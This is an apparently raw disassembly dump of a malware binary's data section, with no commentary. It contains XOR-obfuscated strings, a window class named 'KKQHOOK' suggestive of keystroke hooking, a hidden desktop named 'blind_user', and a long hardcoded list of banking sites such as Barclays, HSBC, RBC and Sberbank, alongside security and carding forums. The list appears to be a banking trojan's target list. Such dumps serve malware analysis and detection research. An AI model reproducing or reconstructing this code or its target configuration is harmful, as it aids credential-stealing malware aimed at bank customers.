word_446ABA dw 0DED9h ; DATA XREF: sub_40B3E8+6F6�o
db 0
byte_446ABD db 81h, 0BAh, 0B5h ; DATA XREF: sub_40B3E8+5F9�o
dd 0F4B1B8B6h, 0B5F4BBA0h, 0BBBCA0A1h, 0B1AEBDA6h
db 0
byte_446AD1 db 81h, 0BAh, 0B5h ; DATA XREF: sub_40B3E8+5E7�o
dd 0F4B1B8B6h, 0B5F4BBA0h, 0BBBCA0A1h, 0B1AEBDA6h, 9DF4F9F4h
dd 869B979Ah, 80979186h, 9A9D84F4h, 0B884F4FAh, 0B1A7B5B1h
dd 0BBB7F4F8h, 0B7B1A6A6h
db 0A0h, 0FAh, 0
byte_446B07 db 0F1h ; DATA XREF: sub_40B3E8+43C�o
dd 0A7F1F9A7h
db 0
byte_446B0D db 84h, 0B8h, 0B1h ; DATA XREF: sub_40B3E8+406�o
dd 0F8B1A7B5h, 0B8B1A7F4h, 0F4A0B7B1h, 0BDA4AC91h, 0BDA0B5A6h
dd 8DF4BABBh, 0A6B5B1h
dword_446B2C dd 0F1F4A7F1h ; sub_40B3E8+639�o
db 0A7h, 0
word_446B32 dw 0B884h ; DATA XREF: sub_40B3E8+387�o
dd 0B1A7B5B1h, 0B1A7F4F8h, 0A0B7B1B8h, 0A4AC91F4h, 0A0B5A6BDh
dd 0F4BABBBDh, 0A0BABB99h
db 0BCh, 0
word_446B52 dw 0A7F1h ; DATA XREF: sub_40B3E8+337�o
db 0
byte_446B55 db 97h, 98h, 87h ; DATA XREF: sub_40AA24+768�o
dd 0F188909Dh, 0BA9D88A7h, 0B7BBA684h, 0A2A6B187h, 0E6E7A6B1h
db 0
byte_446B6D db 82h, 0 ; DATA XREF: sub_40AA24+73D�o
byte_446B6F db 9Fh ; DATA XREF: sub_40AA24+716�o
db 0
aZAgJIsJZAigGzi db '‡»² £µ¦±ˆ™½·¦»§»² ˆƒ½º°»£§ˆ—¡¦¦±º ‚±¦§½»ºˆ‡¼±¸¸‡±¦¢½·±›¶¾±· ±¸µ'
; DATA XREF: sub_40AA24+6DE�o
db '˜»µ°',0
aJZaJzJvDjZz db '†±³½§ ±¦‡±¦¢½·±„¦»·±§§',0 ; DATA XREF: sub_40AA24+5F2�o
word_446BCE dw 0B1BFh ; DATA XREF: sub_40AA24+5DE�o
dd 0B8B1BAA6h, 0B0FAE6E7h
db 2 dup(0B8h), 0
byte_446BDB db 88h ; DATA XREF: sub_40AA24+4B3�o
dd 0A0BBBBB6h, 0A7ADA7FAh
db 0
byte_446BE5 db 0F1h, 0A7h, 88h ; DATA XREF: sub_40AA24+467�o
dd 0B2B0ACB0h, 0FAA2B8AEh, 0A0B5B0h
dword_446BF4 dd 6B746164h, 3233716Bh, 6C6C642Eh db 0
byte_446C01 db 64h, 6Eh, 6Bh ; DATA XREF: sub_40AA24+41A�o
dd 642E716Bh
db 2 dup(6Ch), 0
byte_446C0B db 6Bh ; DATA XREF: sub_40AA24+3F4�o
dd 3233716Bh, 6C6C642Eh
db 0
byte_446C15 db 0F1h, 0A7h, 88h ; DATA XREF: sub_40AA24+3EA�o
; sub_40AA24+410�o ...
db 0F1h, 0A7h, 0
byte_446C1B db 0F1h ; DATA XREF: sub_40AA24+2FF�o
dd 0A7F188A7h, 0B1ACB1FAh
db 0
byte_446C25 db 0B1h, 0BAh, 0B5h ; DATA XREF: sub_40AA24+A6�o
dd 0B0B1B8B6h
db 0A7h, 0B2h, 0
byte_446C2F db 88h ; DATA XREF: sub_40AA24+4D�o
dd 0A2BDA6B0h, 88A7A6B1h, 0A7BDB0BAh, 0A7FAB0A6h, 0A7ADh
dbl_446C44 dq 1.2 ; DATA XREF: sub_4098A8+1002�r
dword_446C4C dd 0A6B2BDE8h, 0F4B1B9B5h, 0E9B7A6A7h, 0A4A0A0BCh, 0F1FBFBEEh
; DATA XREF: sub_4098A8+EBC�o
dd 0FBE8EAA7h, 0B5A6B2BDh, 0EAB1B9h
dword_446C6C dd 0B9A0BCE8h db 0B8h, 0EAh, 0
byte_446C73 db 0B0h ; DATA XREF: sub_4098A8+D86�o
dd 0F4A7BBB0h
db 0
byte_446C79 db 0BAh, 0B1h, 0A3h ; DATA XREF: sub_4098A8+D45�o
dd 0A6B1A2h
dword_446C80 dd 0E6B0ACh dword_446C84 dd 0B0A4A1A3h db 0F4h, 0
word_446C8A dw 0A7F1h ; DATA XREF: sub_4098A8+BAA�o
dd 0F497FBF4h
db 0F1h, 0A7h, 0
byte_446C93 db 88h ; DATA XREF: sub_4098A8+B78�o
dd 0B9B9BBB7h, 0FAB0BAB5h, 0B9BBB7h
dword_446CA0 dd 0B788A7F1h, 0B5B9B9BBh, 0A4FAB0BAh db 0BDh, 0B2h, 0
byte_446CAF db 88h ; DATA XREF: sub_4098A8+B1A�o
dd 0FAB0B9B7h, 0B1ACB1h
dword_446CB8 dd 0B788A7F1h, 0A4FAB0B9h db 0BDh, 0B2h, 0
byte_446CC3 db 0EEh ; DATA XREF: sub_4098A8+A5E�o
dd 0A1E6E4F1h
db 0
byte_446CC9 db 0EBh, 0B0h, 0B9h ; DATA XREF: sub_4098A8+933�o
dd 0E6E9A4h
dword_446CD0 dd 0F188A7F1h, 0B9A0FAA7h db 0A4h, 0
word_446CDA dw 0A4A3h ; DATA XREF: sub_4098A8+4F0�o
dd 0F4A0A7h
byte_446CE0 db 0A5h, 0 ; DATA XREF: sub_4098A8+272�o
; sub_4098A8+616�o ...
word_446CE2 dw 0BDEBh ; DATA XREF: sub_4098A8+21A�o
dd 0F1E9B7B2h
db 0A1h, 0
word_446CEA dw 0B2BDh ; DATA XREF: sub_4098A8+1C6�o
; sub_4098A8+31B�o
db 0B7h, 0
aZAgJIsJZAigGz db '‡»² £µ¦±ˆ™½·¦»§»² ˆƒ½º°»£§',0 ; DATA XREF: sub_4098A8+1B4�o
; sub_4098A8+309�o
byte_446D09 db 0FBh, 0A3h, 0B7h ; DATA XREF: sub_4098A8+171�o
dd 0A4FAB2B1h
db 0BCh, 0A4h, 0
byte_446D13 db 0FBh ; DATA XREF: sub_4098A8+13C�o
db 0
byte_446D15 db 0BCh, 2 dup(0A0h) ; DATA XREF: sub_4098A8+116�o
dd 0FBFBEEA4h
db 0F1h, 0A7h, 0
byte_446D1F db 0F1h ; DATA XREF: sub_4098A8+BB�o
; sub_4098A8+5E6�o ...
dd 0A7F188A7h, 0A0B5B0FAh
db 0
byte_446D29 db 97h, 0B8h, 0BDh ; DATA XREF: sub_408ED0+773�o
dd 9BF4BFB7h, 0F4B1B7BAh, 97F4BB80h, 0BDA0BABBh, 0B1A1BAh
dword_446D40 dd 80808196h db 9Bh, 9Ah, 0
byte_446D47 db 91h ; DATA XREF: sub_408ED0+667�o
; sub_408ED0+6D7�o
db 90h
db 9Dh, 80h, 0
dword_446D4C dd 0B5B1B884h, 0B9F4B1A7h, 0F4B1BFB5h, 0A6A6BBB7h, 0BDA0B7B1h
; DATA XREF: sub_408ED0+5C0�o
dd 0F4A7BABBh, 0F4B0BAB5h, 0F4ADA6A0h, 0BDB5B3B5h
db 0BAh, 0FAh, 0
byte_446D73 db 81h ; DATA XREF: sub_408ED0+547�o
dd 0B8B6B5BAh, 0BBA0F4B1h, 0A0A1B5F4h, 0BDA6BBBCh, 0F4FAB1AEh
dd 0F4998095h, 0F99A9D84h, 0B1B0BB97h, 0F4A7BDF4h, 0A1A5B1A6h
dd 0B0B1A6BDh, 0F4BBA0F4h, 0A4B9BBB7h, 0B1A0B1B8h, 0B1BCA0F4h
dd 0B5A6A0F4h, 0B7B5A7BAh, 0BABBBDA0h
db 0FAh, 0
word_446DBE dw 8095h ; DATA XREF: sub_408ED0+4D2�o
dd 9D84F499h, 0BB97F99Ah
db 0B0h, 0B1h, 0
byte_446DCB db 91h ; DATA XREF: sub_408ED0+460�o
dd 0A6BDA4ACh, 0BBBDA0B5h, 0B5B0F4BAh
db 0A0h, 0B1h, 0
byte_446DDB db 8Dh ; DATA XREF: sub_408ED0+3EA�o
dd 0F4A6A1BBh, 0B0A6B5B7h, 0B9A1BAF4h, 0A6B1B6h
dword_446DEC dd 0FAF1E4E6h db 0E6h, 0A1h, 0
byte_446DF3 db 0F1h ; DATA XREF: sub_408ED0+328�o
dd 0A1E6FAh
dword_446DF8 dd 96999B97h, 8C9B969Bh ; sub_408ED0+289�o
db 0
byte_446E01 db 0DEh, 2 dup(0F4h) ; DATA XREF: sub_408ED0+103�o
dd 0A0A195F4h, 0BDA6BBBCh, 0BDA0B5AEh, 92F4BABBh, 0B1B8BDB5h
db 0B0h, 0FAh, 0
byte_446E1B db 87h ; DATA XREF: sub_408ED0+F1�o
; sub_408ED0+15E�o ...
dd 9D809580h
db 97h, 0
; char ClassName[]
ClassName db 'KKQHOOK',0 ; DATA XREF: sub_408ED0+CD�o
; sub_4098A8+288�o ...
db 0
aSmdJJ db '‘¬¤¸»¦±¦',0 ; DATA XREF: sub_408ED0+3A�o
; sub_40B3E8+C1�o
aRIA db '»·›¶¾±· ',0 ; DATA XREF: sub_408ED0+1E�o
; sub_40B3E8+9E�o
word_446E3E dw 0D3C6h ; DATA XREF: sub_408B4C+177�o
; ---------------------------------------------------------------------------
jmp edx
; ---------------------------------------------------------------------------
dw 0F6EAh
dd 0B4FFE8F5h, 0BAFFE2FFh
db 0
byte_446E4D db 0CAh, 0FBh, 0EEh ; DATA XREF: sub_408B4C+F4�o
db 0F2h, 0
word_446E52 dw 0F5C9h ; DATA XREF: sub_408B4C+DF�o
dd 0FBEDEEFCh, 0D7C6FFE8h, 0F5E8F9F3h, 0EEFCF5E9h, 0BADFD3C6h
dd 0EFEEFFC9h, 0FFC9C6EAh, 0EAEFEEh
dword_446E74 dd 0F7EEF2B4h db 0
byte_446E79 db 66h, 59h, 57h ; DATA XREF: sub_40844F+FE�o
dd 425F145Eh, 79151A5Fh, 5B4E491Ah, 591A4E48h, 55586600h
dd 49144E55h
db 43h, 49h, 0
byte_446E97 db 1Fh ; DATA XREF: sub_40844F+D9�o
dd 57596649h, 534A145Eh
db 5Ch, 0
word_446EA2 dw 5166h ; DATA XREF: sub_40833E+71�o
dd 5F54485Fh, 14080956h, 56565Eh
byte_446EB0 db 0F0h, 0F7h, 0 ; DATA XREF: sub_408048+229�o
byte_446EB3 db 0D3h ; DATA XREF: sub_406D2E+F05�o
dd 9A92929Ah, 9CD39891h, 8F9C8A99h
db 98h, 0
word_446EC2 dw 9AD3h ; DATA XREF: sub_406D2E+ED8�o
dd 919A9292h
db 98h, 0D3h, 0
byte_446ECB db 0DDh ; DATA XREF: sub_406D2E+E6B�o
db 0
byte_446ECD db 0C7h, 0 ; DATA XREF: sub_406D2E+DE9�o
byte_446ECF db 0DDh ; DATA XREF: sub_406D2E+D83�o
dd 0C7A5D8h
byte_446ED4 db 81h, 0 ; DATA XREF: sub_406D2E+6CF�o
aPVEPVE db 'Á»¯¼°¸¢Ø¥Ð»²¯°¢Ø¥ÃÝ',0 ; DATA XREF: sub_406D2E+625�o
aNPVE db 'Á°¼´³ºÐ»²¯°¢Ø¥ÃÝ',0 ; DATA XREF: sub_406D2E+5DC�o
; OLECHAR aName
aName: ; DATA XREF: sub_406D2E+3D�o
unicode 0, <name>,0
align 4
; OLECHAR psz
psz: ; DATA XREF: sub_406D2E+2D�o
unicode 0, <value>,0
unk_446F14 db 5Bh ; [ ; DATA XREF: sub_406A40+A8�o
db 7Fh, 75h, 64h
aYeypb6_xbsdxsb db 'yeypb6_xbsdxsb6Snfzydsd',0
; OLECHAR sz
sz: ; DATA XREF: sub_40696D+34�o
unicode 0, <{9BA05972-F6A8-11CF-A442-00A0C90A8F39}>,0
; char String[]
String db '<HTML><!--',0 ; DATA XREF: sub_4061F7+4E4�o
; sub_4061F7+4EF�o ...
aXOkrecv11 db 'X-okRecv11',0 ; DATA XREF: sub_4061F7+422�o
aUyznQy db 'uyzN]QY',0 ; DATA XREF: sub_4061F7+389�o
dword_446F9C dd 49194F19h, 711C111Ch, 534E5F55h, 485A534Fh, 4852751Ch
; DATA XREF: sub_4061F7+340�o
dd 59524E59h, 44791C48h, 4E53504Ch
db 59h, 4Eh, 0
byte_446FBF db 60h ; DATA XREF: sub_4061F7+1EA�o
dd 4C445975h, 594E5350h, 59445912h
db 1Ch, 0
word_446FCE dw 5D6Ch ; DATA XREF: sub_4061F7+B5�o
db 48h, 54h, 0
byte_446FD3 db 6Fh ; DATA XREF: sub_4061F7+A3�o
dd 4B485A53h, 60594E5Dh, 4E5F5571h, 5A534F53h, 79756048h
dd 48596F1Ch, 6F604C49h, 4C494859h
db 0
byte_446FF5 db 7Dh, 2 dup(4Ch) ; DATA XREF: sub_405E88+333�o
dd 52594A79h, 6F604F48h, 5159545Fh, 7D604F59h, 604F4C4Ch
dd 504C4479h, 4E594E53h, 485F7D60h, 485D4A55h, 785B5255h
dd 51495F53h, 60485259h, 4E497F12h, 4852594Eh
db 0
byte_447031 db 7Dh, 2 dup(4Ch) ; DATA XREF: sub_405E88+309�o
dd 52594A79h, 6F604F48h, 5159545Fh, 7D604F59h, 604F4C4Ch
dd 504C4479h, 4E594E53h, 4A5D7260h, 485D5B55h, 605B5255h
dd 4E497F12h, 4852594Eh
db 0
aPsPioynszzpury db '{PS^]PiOYNsZZPURY',0 ; DATA XREF: sub_405E88+2CC�o
byte_447077 db 6Fh ; DATA XREF: sub_405E88+2BA�o
dd 4B485A53h, 60594E5Dh, 4E5F5571h, 5A534F53h, 556B6048h
dd 4B535852h, 497F604Fh, 52594E4Eh, 4E596A48h, 5253554Fh
dd 48527560h, 59524E59h, 596F1C48h, 52554848h
db 5Bh, 4Fh, 0
byte_4470B3 db 55h ; DATA XREF: sub_405E88+271�o
dd 504C4459h, 12594E53h, 594459h
dword_4470C0 dd 6F604F19h, 4B485A53h, 60594E5Dh, 4E5F5571h, 5A534F53h
; DATA XREF: sub_405E88+245�o
dd 52756048h, 524E5948h, 791C4859h, 53504C44h, 604E594Eh
dd 52555D71h, 5D597A60h, 594E4948h, 4852537Fh, 6050534Eh
dd 687D797Ah, 63796E69h, 7D7F7370h, 7F7D7170h, 79727574h
dd 7F737063h, 6B737877h
db 72h, 0
word_44711A dw 5945h ; DATA XREF: sub_405E88+1E1�o
db 4Fh, 0
aNskoyryklns_yo db '~NSKOYrYKlNS_YOO',0 ; DATA XREF: sub_405E88+1CF�o
byte_44712F db 12h ; DATA XREF: sub_405E88+1BD�o
dd 7D7A7978h, 60687069h, 687A736Fh, 796E7D6Bh, 5F557160h
dd 534F534Eh, 6B60485Ah, 53585255h, 7F604F4Bh
aInnyrhjynousrY db 'INNYRHjYNOUSR`yDLPSNYN`~NSKOYrYKlNS_YOO',0
dword_44717C dd 687A736Fh, 796E7D6Bh, 50536C60h, 59555F55h, 5571604Fh
; DATA XREF: sub_405E88+101�o
dd 4F534E5Fh, 60485A53h, 5852556Bh, 604F4B53h, 4E4E497Fh
dd 6A485259h, 554F4E59h, 75605253h, 4E594852h, 1C485952h
dd 4848596Fh, 4F5B5255h, 52536660h, 19604F59h
db 49h, 0
word_4471CA dw 0A0Dh ; DATA XREF: sub_405E88+7A�o
; sub_405E88+B7�o ...
db 0Ch, 0Dh, 0
byte_4471CF db 6Fh ; DATA XREF: sub_405E88+54�o
dd 6B687A73h, 60796E7Dh, 4E5F5571h, 5A534F53h, 556B6048h
dd 4B535852h, 497F604Fh, 52594E4Eh, 4E596A48h, 5253554Fh
dd 48527560h, 59524E59h, 596F1C48h, 52554848h, 66604F5Bh
dd 4F595253h, 491960h
dword_447214 dd 48541300h, 25051hdword_44721C dd 535E1300h, 24558hdword_447224 dd 5F4F1300h, 484C554Eh db 2, 0
word_44722E dw 594Fh ; DATA XREF: sub_4054C8+84A�o
dd 51556848h, 48495359h, 4F191E14h, 101E1514h, 7154919h
db 0
byte_447245 db 41h, 0 ; DATA XREF: sub_4054C8+825�o
byte_447247 db 58h ; DATA XREF: sub_4054C8+7DB�o
dd 51495F53h, 12485259h, 4F124F19h, 55515E49h, 7151448h
db 0
byte_44725D db 5Ah, 49h, 52h ; DATA XREF: sub_4054C8+79B�o
dd 5355485Fh, 4F191C52h, 471514h
dword_44726C dd 12195F19h db 0Eh, 49h, 0
byte_447273 db 0 ; DATA XREF: sub_4054C8+6F1�o
dd 554E5F4Fh, 2484Ch
dword_44727C dd 535A1300h, 2514Ehdword_447284 dd 4C525500h, 481C4849h, 1594C45h, 5E494F1Eh, 1E485551h
; DATA XREF: sub_4054C8+6A8�o
dd 505D4A1Ch, 1B015949h
db 1Bh, 2, 0
off_4472A3 dd offset loc_404F16+3 ; DATA XREF: sub_4054C8+565�o
byte_4472A7 db 0 ; DATA XREF: sub_4054C8+494�o
; sub_4054C8+612�o
dd 494C5255h, 45481C48h, 1E01594Ch, 48555859h, 5D4A1C1Eh
dd 1594950h, 1B4F191Bh, 515D521Ch, 191B0159h, 1B49194Fh
dd 4E5E0002h, 363102h
dword_4472D8 dd 4C525500h, 481C4849h, 1594C45h, 5558591Eh, 4A1C1E48h
; DATA XREF: sub_4054C8+326�o
dd 5949505Dh, 49191B01h, 5D521C1Bh, 1B015951h, 21B5Dh
dd 31024E5Eh
db 36h, 0
word_447306 dw 5A00h ; DATA XREF: sub_4054C8+2C9�o
dd 1C514E53h, 55485F5Dh, 1E015253h, 1C1E4F19h, 54485951h
dd 1E015853h, 686F736Ch, 5D521C1Eh, 1E015951h, 21E4F19h
db 0
byte_447331 db 5Ah, 19h, 12h ; DATA XREF: sub_4054C8+286�o
db 0Fh, 49h, 0
byte_447337 db 0 ; DATA XREF: sub_4054C8+250�o
dd 4558535Eh
db 2, 0
word_44733E dw 1300h ; DATA XREF: sub_4054C8+224�o
dd 585D5954h
db 2, 0
word_447346 dw 694Dh ; DATA XREF: sub_4054C8+1F8�o
; sub_4061F7+350�o
dd 536F7263h, 2D74666Fh, 70726F43h
db 0
byte_447355 db 0, 48h, 55h ; DATA XREF: sub_4054C8+1E8�o
dd 2595048h, 49194F19h, 55481300h, 2595048h
db 0
byte_447369 db 0, 54h, 59h ; DATA XREF: sub_4054C8+1BF�o
dd 2585Dh
dword_447370 dd 51485400h db 50h, 2, 0
byte_447377 db 12h ; DATA XREF: sub_4054C8+168�o
dd 514854h
dword_44737C dd 5F194F19h ; sub_4054C8+412�o
db 19h, 5Fh, 0
byte_447383 db 16h ; DATA XREF: sub_40523D:loc_4052F5�o
db 12h, 16h, 0
byte_447387 db 3 ; DATA XREF: sub_40523D+4D�o
db 0
byte_447389 db 56h, 5Eh, 17h ; DATA XREF: sub_404EC6+15E�o
db 0Eh, 0
word_44738E dw 175Eh ; DATA XREF: sub_404EC6+FA�o
db 0Eh, 0
word_447392 dw 34Bh ; DATA XREF: sub_404EC6+8C�o
dd 13494B5Eh, 494B5E03h, 4B5E0313h, 5E031349h, 313494Bh
dd 13494B5Eh, 494B5E03h
db 13h, 3, 0
byte_4473B3 db 28h ; DATA XREF: sub_404EC6+57�o
dd 0E175E56h
db 56h, 0
word_4473BA dw 998Ah ; DATA XREF: sub_40481B+5A8�o
dd 0C2D8D3D5h, 88C4D3h
dword_4473C4 dd 0D8D3D58Ah, 88C4D3C2h db 0
byte_4473CD db 8Ah, 99h, 0D0h ; DATA XREF: sub_40481B+527�o
; ---------------------------------------------------------------------------
fstp1 st
retn 88h
; ---------------------------------------------------------------------------
byte_4473D5 db 8Ah, 99h, 0C3h ; DATA XREF: sub_40481B+4FA�o
db 88h, 0
word_4473DA dw 998Ah ; DATA XREF: sub_40481B+4D2�o
db 0D4h, 88h, 0
byte_4473DF db 8Ah ; DATA XREF: sub_40481B+49A�o
dd 88DF99h
dword_4473E4 dd 88DF8Ah dword_4473E8 dd 88C38Ah dword_4473EC dd 88D48Ah dword_4473F0 dd 88C4D48Ah db 0
byte_4473F5 db 2 dup(9Bh), 88h ; DATA XREF: sub_40481B+200�o
db 96h, 0
word_4473FA dw 978Ah ; DATA XREF: sub_40481B+6D�o
dd 969B9Bh
byte_447400 db 0BBh, 0BCh, 0 ; DATA XREF: sub_404529+2D9�o
; sub_40481B+5F1�o
byte_447403 db 99h ; DATA XREF: sub_404529+22A�o
dd 93D59399h, 0BBD593D5h
db 0BCh, 0
aCuUUClcuN db 'À×Ä–“Õ“Õ“Õ–‹–“Ã',0 ; DATA XREF: sub_404529+135�o
aCS db '–œ™',0 ; DATA XREF: sub_404529+FF�o
aUU db '“Å“Õ',0 ; DATA XREF: sub_404529+95�o
; sub_40481B+AB�o ...
aSC db '™œ–',0 ; DATA XREF: sub_404529+5F�o
; char szDesktop[]
szDesktop db 'blind_user',0 ; DATA XREF: sub_4043CA+65�o
; sub_40446E+12�o
aSS db '¿éºµÙº¿é',0 ; DATA XREF: sub_40406B+286�o
dword_447440 dd 0F5F5F6A0h, 0DA9097EAh, 0BAF6FFFEh, 0F4A4E9BFh, 9097F6EFh
; DATA XREF: sub_40406B+213�o
dd 0BAFCF3DAh, 0E9F3E2FFh, 0E9BFBAEEh, 0EEF5FDBAh, 0F5F6BAF5h
dd 9097EAF5h, 0F6FFFEDAh, 0A4E9BFBAh, 97F6EFF4h
db 90h
align 2
word_44747A dw 0F9C6h ; DATA XREF: sub_40406B+1AE�o
dd 0FBF7F7F5h, 0F9B4FEF4h
db 0F5h, 0F7h, 0
byte_447487 db 0BFh ; DATA XREF: sub_40406B+17B�o
dd 0F5F9C6E9h, 0F4FBF7F7h, 0F3EAB4FEh
db 0FCh, 0
word_447496 dw 0E9BFh ; DATA XREF: sub_40406B+156�o
dd 0F6E9E2C6h, 0A3F6FEFCh, 0FBF8B4E2h
db 0EEh, 0
word_4474A6 dw 0F9C6h ; DATA XREF: sub_40406B+11A�o
dd 0FFB4FEF7h
db 0E2h, 0FFh, 0
byte_4474AF db 0BFh ; DATA XREF: sub_40406B+FA�o
dd 0F7F9C6E9h, 0F3EAB4FEh
db 0FCh, 0
word_4474BA dw 0E9BFh ; DATA XREF: sub_40406B+DA�o
dd 0F6E9E2C6h, 0F4F6FEFCh, 0FBF8B4EEh
db 0EEh, 0
aKNoLEfLKNeoOke db 'Š¶¿®¸«¼…”°º«¶ª¶¿…Ž°·½¶®ª…š¬««¼·¼«ª°¶·…Š±¼µµŠ¼«¯°º¼–»³¼º¼µ¸ '
; DATA XREF: sub_403BE7+332�o
db '•¶¸½',0
aSiLnN db '˜©¸«´¼·',0 ; DATA XREF: sub_403BE7+30D�o
aNLF db '±«¼¸½°·¾”¶½¼µ',0 ; DATA XREF: sub_403BE7+2FB�o
; const CHAR WindowName
WindowName db 0 ; DATA XREF: sub_403BE7+2DE�o
; sub_405E88+317�o ...
word_44752A dw 959Ah ; DATA XREF: sub_403BE7+2B4�o
dd 859D908Ah, 9085AAFCh, 0B6AB89B7h, 0ABBC8ABAh, 0EAABBCAFh
db 0EBh, 0
word_447542 dw 0AAFCh ; DATA XREF: sub_403BE7+210�o
dd 0F7AAFC85h, 0B5B5BDh
dword_44754C dd 0EDE9FCA2h, 0EDE9FC81h, 0E9FCF481h, 0FCF481EDh, 0F481EDE9h
; DATA XREF: sub_403BE7+2B�o
dd 81EDE9FCh, 0EDE9FCF4h, 2 dup(0EDE9FC81h)
db 81h, 0A4h, 0
byte_447573 db 0F9h ; DATA XREF: sub_403A5F+130�o
db 0
byte_447575 db 0FCh, 0AAh, 85h ; DATA XREF: sub_403A5F+53�o
dd 0BCF7AAFCh
db 0A1h, 0BCh, 0
byte_44757F db 0FCh ; DATA XREF: sub_40399B+7D�o
dd 81E1E9h
byte_447584 db 56h, 0 ; DATA XREF: sub_4037CA+32�o
; .text:00403896�o
word_447586 dw 83h ; DATA XREF: sub_4036BC+2F�o
byte_447588 db 0E3h, 0 ; DATA XREF: sub_4035DB+9B�o
word_44758A dw 0E995h ; DATA XREF: sub_40341E+32�o
; sub_40349A+3F�o
db 0
aChevychasebank db 'chevychasebank.com',0 ; DATA XREF: .text:0043C1E0�o
aGronxplanets_r db 'gronxplanets.ru',0 ; DATA XREF: .text:0043C1DC�o
aWww_mdmbank_ru db 'www.mdmbank.ru',0 ; DATA XREF: .text:0043C1D8�o
aFethard_biz db 'fethard.biz',0 ; DATA XREF: .text:0043C1D4�o
aRoyalbank_com db 'royalbank.com',0
aSecuritylab_ru db 'securitylab.ru',0 ; DATA XREF: .text:0043C1CC�o
aTatNeftbank_ru db 'tat-neftbank.ru',0 ; DATA XREF: .text:0043C1C8�o
aSeclab_ru db 'seclab.ru',0 ; DATA XREF: .text:0043C1C4�o
aOpenbank_com db 'openbank.com',0 ; DATA XREF: .text:0043C1C0�o
aGutabank_ru db 'gutabank.ru',0 ; DATA XREF: .text:0043C1BC�o
aWww_b2bTrust_c db 'www.b2b-trust.com',0 ; DATA XREF: .text:0043C1B8�o
aGrepwareFacili db 'grepware-facility.ru',0 ; DATA XREF: .text:0043C1B4�o
aWww_uralsib_ru db 'www.uralsib.ru',0 ; DATA XREF: .text:0043C1B0�o
a53bank_com db '53bank.com',0 ; DATA XREF: .text:0043C1AC�o
aWww_nbc_caInde db 'www.nbc.ca/index.php',0 ; DATA XREF: .text:0043C1A8�o
aTotallyfreeban db 'totallyfreebanking.com',0 ; DATA XREF: .text:0043C1A4�o
aBarclays_com db 'barclays.com',0 ; DATA XREF: .text:0043C1A0�o
aWww_lbcdirect_ db 'www.lbcdirect.laurentianbank.ca/index.php',0
; DATA XREF: .text:0043C19C�o
aKidosBank_ru db 'kidos-bank.ru',0 ; DATA XREF: .text:0043C198�o
aYambo_biz db 'yambo.biz',0 ; DATA XREF: .text:0043C194�o
aProrat_net db 'prorat.net',0 ; DATA XREF: .text:0043C190�o
aWww1_hsbc_caIn db 'www1.hsbc.ca/index.php',0 ; DATA XREF: .text:0043C18C�o
aWww_ovk_ru db 'www.ovk.ru',0 ; DATA XREF: .text:0043C188�o
aWww_rbc_com db 'www.rbc.com',0 ; DATA XREF: .text:0043C184�o
aMasterX_comFor db 'master-x.com/forum/',0 ; DATA XREF: .text:0043C180�o
aWww_allahabadb db 'www.allahabadbank.com',0 ; DATA XREF: .text:0043C17C�o
aOnlineBusiness db 'online-business.lloydstsb.co.uk',0 ; DATA XREF: .text:0043C178�o
aMyonlineaccoun db 'myonlineaccounts2.abbeynational.co.uk',0 ; DATA XREF: .text:0043C174�o
aWww_absolutban db 'www.absolutbank.ru',0 ; DATA XREF: .text:0043C170�o
aKavkazcenter_c db 'kavkazcenter.com/russ',0 ; DATA XREF: .text:0043C16C�o
aWww_netmagiste db 'www.netmagister.com',0 ; DATA XREF: .text:0043C168�o
aWww_kmb_ru db 'www.kmb.ru',0 ; DATA XREF: .text:0043C164�o
aWww_spyinstruc db 'www.spyinstructors.com',0 ; DATA XREF: .text:0043C160�o
aAcroleinHawk_r db 'acrolein-hawk.rubanking.halifax-online.co.uk',0
; DATA XREF: .text:0043C15C�o
aWww_icbank_ru db 'www.icbank.ru',0 ; DATA XREF: .text:0043C158�o
aWww_bankofindi db 'www.bankofindia.com',0 ; DATA XREF: .text:0043C154�o
aPizdabolInc_ru db 'pizdabol-inc.ru',0 ; DATA XREF: .text:0043C150�o
aWww_sbrf_ru db 'www.sbrf.ru',0 ; DATA XREF: .text:0043C14C�o
aWww_candidatev db 'www.candidateverifier.com/index.php',0 ; DATA XREF: .text:0043C148�o
aWww_worldbank_ db 'www.worldbank.org/index.php',0 ; DATA XREF: .text:0043C144�o
aDigitalRelaxkg db 'digital-relaxkgb.ru',0 ; DATA XREF: .text:0043C140�o
aAsmworm_com db 'asmworm.com',0 ; DATA XREF: .text:0043C138�o
aAtmacasoft_com db 'atmacasoft.com',0 ; DATA XREF: .text:0043C134�o
aCrutop_nuVbu_1 db 'crutop.nu/vbulletin/showthread.php',0 ; DATA XREF: .text:0043C130�o
aWww_uniastrum_ db 'www.uniastrum.ru',0 ; DATA XREF: .text:0043C12C�o
aCrutop_nuVbu_0 db 'crutop.nu/vbulletin/forumdisplay.php',0 ; DATA XREF: .text:0043C128�o
aWww_mmbank_ru db 'www.mmbank.ru',0 ; DATA XREF: .text:0043C124�o
aCrutop_nuVbull db 'crutop.nu/vbulletin/',0 ; DATA XREF: .text:0043C120�o
aAlfabank_ru db 'alfabank.ru',0 ; DATA XREF: .text:0043C11C�o
aHyperSpaceFuel db 'hyper-space-fuel.ru',0 ; DATA XREF: .text:0043C118�o
aWww_cwbank_com db 'www.cwbank.com',0 ; DATA XREF: .text:0043C114�o
aWww_vtb_ru db 'www.vtb.ru',0 ; DATA XREF: .text:0043C110�o
aWww_cibc_com db 'www.cibc.com',0 ; DATA XREF: .text:0043C10C�o
aWww_bankofmadu db 'www.bankofmadura.com',0 ; DATA XREF: .text:0043C108�o
aWww_bmo_com db 'www.bmo.com',0 ; DATA XREF: .text:0043C104�o
aWww_bankBanque db 'www.bank-banque-canada.ca/index.php',0 ; DATA XREF: .text:0043C100�o
aWww_masterbank db 'www.masterbank.ru',0 ; DATA XREF: .text:0043C0FC�o
aEbookfinaltras db 'ebookfinaltrash.ru',0 ; DATA XREF: .text:0043C0F8�o
aMasterX_com db 'master-x.com',0 ; DATA XREF: .text:0043C0F4�o
aWww_bbin_ru db 'www.bbin.ru',0 ; DATA XREF: .text:0043C0F0�o
aOlb2_nationet_ db 'olb2.nationet.com',0 ; DATA XREF: .text:0043C0EC�o
aWelcome3_smile db 'welcome3.smile.co.uk',0 ; DATA XREF: .text:0043C0E8�o
aWww_baltbank_r db 'www.baltbank.ru',0 ; DATA XREF: .text:0043C0E4�o
aNew_egg_com db 'new.egg.com',0 ; DATA XREF: .text:0043C0E0�o
aProdexteam_n_0 db 'prodexteam.netcrutop.nu',0 ; DATA XREF: .text:0043C0DC�o
aWww_proxySocks db 'www.proxy-socks.net',0 ; DATA XREF: .text:0043C0D8�o
